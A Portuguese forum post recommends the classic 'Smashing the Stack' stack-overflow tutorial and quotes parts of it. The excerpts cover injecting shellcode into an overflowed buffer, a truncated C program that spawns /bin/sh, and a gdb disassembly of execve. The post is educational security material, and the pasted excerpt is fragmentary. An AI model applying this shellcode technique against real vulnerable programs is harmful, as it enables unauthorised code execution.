• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!


Remote Code Execution - smash the stack

1 post in this topic

excelente artigo sobre este maravilhoso mundo.. aqui podem encontrar as bases para os voos mais altos  :D

`smash the stack` [C programming] n. On many C implementations

it is possible to corrupt the execution stack by writing past

the end of an array declared auto in a routine.  Code that does

this is said to smash the stackand can cause return from the

routine to jump to a random address.  This can produce some of

the most insidious data-dependent bugs known to mankind.

Variants include trash the stackscribble the stackmangle

the stack; the term mung the stack is not usedas this is

never done intentionally. See spam; see also alias bug,

fandango on corememory leakprecedence lossageoverrun screw.

                                  Shell Code


  So now that we know that we can modify the return address and the flow of

executionwhat program do we want to execute?  In most cases we'll simply

want the program to spawn a shell.  From the shell we can then issue other

commands as we wish.  But what if there is no such code in the program we

are trying to exploit?  How can we place arbitrary instruction into its

address space?  The answer is to place the code with are trying to execute in

the buffer we are overflowingand overwrite the return address so it points

back into the buffer.  Assuming the stack starts at address 0xFFand that S

stands for the code we want to execute the stack would then look like this:

The code to spawn a shell in C looks like:


#include <stdio.h>

void main() {
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;

[aleph1]$ gcc -o shellcode -ggdb -static shellcode.c
[aleph1]$ gdb shellcode
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux)Copyright 1995 Free Software FoundationInc...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000130 <main>:       pushl  %ebp
0x8000131 <main+1>:     movl   %esp,%ebp
0x8000133 <main+3>:     subl   $0x8,%esp
0x8000136 <main+6>:     movl   $0x80027b8,0xfffffff8(%ebp)
0x800013d <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x8000144 <main+20>:    pushl  $0x0
0x8000146 <main+22>:    leal   0xfffffff8(%ebp),%eax
0x8000149 <main+25>:    pushl  %eax
0x800014a <main+26>:    movl   0xfffffff8(%ebp),%eax
0x800014d <main+29>:    pushl  %eax
0x800014e <main+30>:    call   0x80002bc <__execve>
0x8000153 <main+35>:    addl   $0xc,%esp
0x8000156 <main+38>:    movl   %ebp,%esp
0x8000158 <main+40>:    popl   %ebp
0x8000159 <main+41>:    ret
End of assembler dump.
(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>:   pushl  %ebp
0x80002bd <__execve+1>: movl   %esp,%ebp
0x80002bf <__execve+3>: pushl  %ebx
0x80002c0 <__execve+4>: movl   $0xb,%eax
0x80002c5 <__execve+9>: movl   0x8(%ebp),%ebx
0x80002c8 <__execve+12>:        movl   0xc(%ebp),%ecx
0x80002cb <__execve+15>:        movl   0x10(%ebp),%edx
0x80002ce <__execve+18>:        int    $0x80
0x80002d0 <__execve+20>:        movl   %eax,%edx
0x80002d2 <__execve+22>:        testl  %edx,%edx
0x80002d4 <__execve+24>:        jnl    0x80002e6 <__execve+42>
0x80002d6 <__execve+26>:        negl   %edx
0x80002d8 <__execve+28>:        pushl  %edx
0x80002d9 <__execve+29>:        call   0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>:        popl   %edx
0x80002df <__execve+35>:        movl   %edx,(%eax)
0x80002e1 <__execve+37>:        movl   $0xffffffff,%eax
0x80002e6 <__execve+42>:        popl   %ebx
0x80002e7 <__execve+43>:        movl   %ebp,%esp
0x80002e9 <__execve+45>:        popl   %ebp
0x80002ea <__execve+46>:        ret
0x80002eb <__execve+47>:        nop
End of assembler dump.

leiam o artigo completo... muito fixe para quer saber mais...  ;)



programing our luck

house of horus


Share this post

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now